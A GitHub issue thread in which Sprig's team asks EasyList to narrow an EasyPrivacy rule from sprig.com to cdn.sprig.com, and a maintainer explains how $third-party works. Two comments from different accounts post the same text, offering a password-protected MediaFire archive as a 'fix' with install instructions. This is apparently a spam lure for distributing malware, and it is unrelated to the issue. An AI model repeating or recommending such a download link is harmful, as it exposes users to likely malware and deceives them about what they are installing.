### ISSUE TITLE
False Positive: sprig.com (Request to replace with cdn.sprig.com)

### ISSUE THREAD

**Issue by tanner-pierce** [easylist/easylist#19892]
[Sprig](https://sprig.com/) is a Product Experience platform offering tools including Link Surveys, In-Product Surveys, Heatmaps, and Session Replays. 

Our platform provides the ability for Product Managers and User Researchers at companies like Coinbase, Robinhood and Paypal to get contextual product feedback to build better product experiences for their end users. 

We never use cookies, we do not promote as an advertisement/pop up platform, nor do we actively change or degrade a user’s experience.

We’ve recently noticed that that Ad Blockers and browsers using EasyPrivacy are blocking several of our services due to this logged [Issue](https://github.com/easylist/easylist/issues/19623), which is causing significant disruptions for our customers:

**1. SSO Blockage:** SSO login redirects are being blocked, preventing user authentication via SSO. (e.g. https://accounts.google.com/ to https://api.sprig.com/1/auth/login/gsso) --> Estimated to impact ~30% of all paid users
**2. Link Surveys:** Our opt-in direct Link Surveys are being blocked, hindering customer ability to gather user feedback. Link Surveys are _always_ opt-in.

We believe this appeal to be in line with your posted [false-positive](https://github.com/easylist/easylist/blob/master/README.md#list-issues) parameters and hope that we can remedy 1 and 2 above.

**Resolution:**
We kindly request that sprig.com is replaced on the list with cdn.sprig.com to resolve issues listed above. 

By replacing  `sprig.com^$third-party` with `cdn.sprig.com^$third-party,domain=~sprig.com` on the EasyPrivacy list, services that invoke the list will more specifically prevent the Sprig SDK from initializing, but allow our customers and users to access [sprig.com](http://sprig.com/) directly to login via SSO and use our direct Link Surveys.

We appreciate the important work you do and are happy to provide more information if needed.
Thank you for your consideration.

Regards,
The Sprig Product & Eng Team

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ryanbr** [comment]
The point of the $third-party, it won't cover `*.sprig.com` only sites outside of sprig.com

**Comment by tanner-pierce** [comment]
Thanks @ryanbr for the reply.
Unfortunately, each blocker can interpret easylist’s rules slightly different. We have seen in a couple cases where the redirections back to [api.sprig.com](http://api.sprig.com/) from google SSO is being filtered out. The following video is an example of AdGuard filtering out this redirection.
Thank you.
[Screen Recording 2024-09-03 at 12.47.08 PM.mov.zip](https://github.com/user-attachments/files/16853468/Screen.Recording.2024-09-03.at.12.47.08.PM.mov.zip)

**Comment by ryanbr** [comment]
Thats an issue with the adblocker, if translated correctly its third-party to the sprig.com domain. Would take it up with the extension causing issues.
